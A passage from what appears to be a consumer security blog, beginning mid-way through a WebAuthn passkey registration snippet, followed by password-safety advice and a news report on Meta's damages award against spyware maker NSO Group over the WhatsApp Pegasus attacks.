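      // ES256: the private key never leaves the authenticator; only a public
      // key is registered, so there is no reusable secret to guess or phish.
      pubKeyCredParams: [{ type: "public-key", alg: -7 }],
      authenticatorSelection: { residentKey: "required", userVerification: "preferred" },
    },
  });
}
```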
Beyond the technical risks, there are serious personal consequences when passwords are stolen. Due to our widespread online presence, once an attacker obtains your login credentials, they can access sensitive documents, reset other account passwords, or impersonate you online. From there, the path to identity theft is short. Criminals can use stolen data to open credit lines, file fraudulent tax returns, or drain your savings. In many cases, victims don’t even know their identity has been stolen until serious financial or legal damage has already occurred.
In the age of AI, the stakes are higher, and the window of vulnerability is shorter. A single reused or weak password might be all it takes to lose control over your digital identity.
The lesson is clear: we can’t rely on passwords alone anymore. AI has changed the game even further, and now it’s up to us to change how we play it. And as far as passwords go, there are some ways to use them as securely as possible where you have no alternative:
- Make passwords as strong as possible and never reuse passwords.
- Use a password manager to help remember all the passwords.
- Where possible, use MFA as an extra layer.
- Pressure important services into adopting passkeys, and use them as soon as the occasion arises.
You can use Malwarebytes’ free Digital Footprint scan to see how many passwords of yours have been included in leaks and data breaches.
WhatsApp hack: Meta wins payout over NSO Group spyware
Meta has won almost $170m in damages from Israel-based NSO Group, maker of the Pegasus spyware. The ruling caps a six-year legal case in which Meta accused the company of misusing its servers to spy on users.
According to the original complaint against NSO Group, filed in October 2019, the spyware vendor used WhatsApp servers to send malware to around 1400 mobile phones. The purpose was to gain access to the messages on those devices, which were typically used by attorneys, journalists, human rights activists, political dissidents, diplomats, and other senior foreign government officials.
NSO Group reverse engineered WhatsApp’s software and developed its own software and servers to send messages containing malware to victims via the WhatsApp service. That malware installed itself on the victims’ smartphones using a zero-click attack, meaning the victim didn’t have to take any action, such as opening a link or even answering a call, for the compromise to happen; it was enough simply for the message to arrive.
A judge ruled in December that NSO Group had repeatedly dodged requests to provide its code for review, and granted Meta partial summary judgment over the vendor. That set up conditions for a trial to determine damages that started in late April.
NSO Group reportedly argued that Facebook lost nothing as part of the attack and should therefore pay the minimum amount in damages. However, the jury awarded Meta $444,719 in compensatory damages and $167,254,000 in punitive damages.
NSO Group is no stranger to controversy. The US federal government blacklisted it in 2021 for enabling foreign governments to spy on a range of people in acts of “transnational repression”. The same year, the Pegasus Project, a collaborative journalism investigation, alleged that the company’s spyware had been used to target over 180 journalists around the world. The European Data Protection Supervisor recommended an EU ban on the technology in 2022, although this has not yet happened.
The ruling drew praise from Amnesty International, which had filed a court brief as part of the case outlining the human rights implications of the attacks on Meta. The organization commented:
“This decision should serve as a wake-up call to governments to take proactive, concrete steps to regulate the surveillance industry, to enforce safeguards on their surveillance practices, and to comprehensively ban tools that are inherently incompatible with human rights obligations and standards, such as Pegasus.”
One takeaway stands out for our readers: end-to-end encryption is important for privacy, but it is not enough on its own.
As Meta pointed out in its complaint, NSO couldn’t decrypt WhatsApp messages in transit to users because they are encrypted when they’re sent from one device and stay unreadable until they’re decrypted by the receiving device. However, that doesn’t stop someone from reading the messages after they’re decrypted by the receiving device—someone who compromises your smartphone or PC has control over all of the data on it, including those decrypted messages.
For consumers, this means applying more layers of protection in the form of regular updates, security software, and cybersecurity awareness. Never open links, files, or videos from someone you don’t know. Be skeptical even if they’re from someone you do know—we recommend checking with them over a different channel first to ensure it was really them who sent it.
In this case, even that would not have been enough, because NSO Group was able to infect phones without the victim even answering the call. Attacks this sophisticated often target people in sensitive roles, such as journalists, activists, and government workers. Google has an advanced protection program for people like this, while Apple launched Lockdown Mode for high-risk users. Facebook has its own initiative.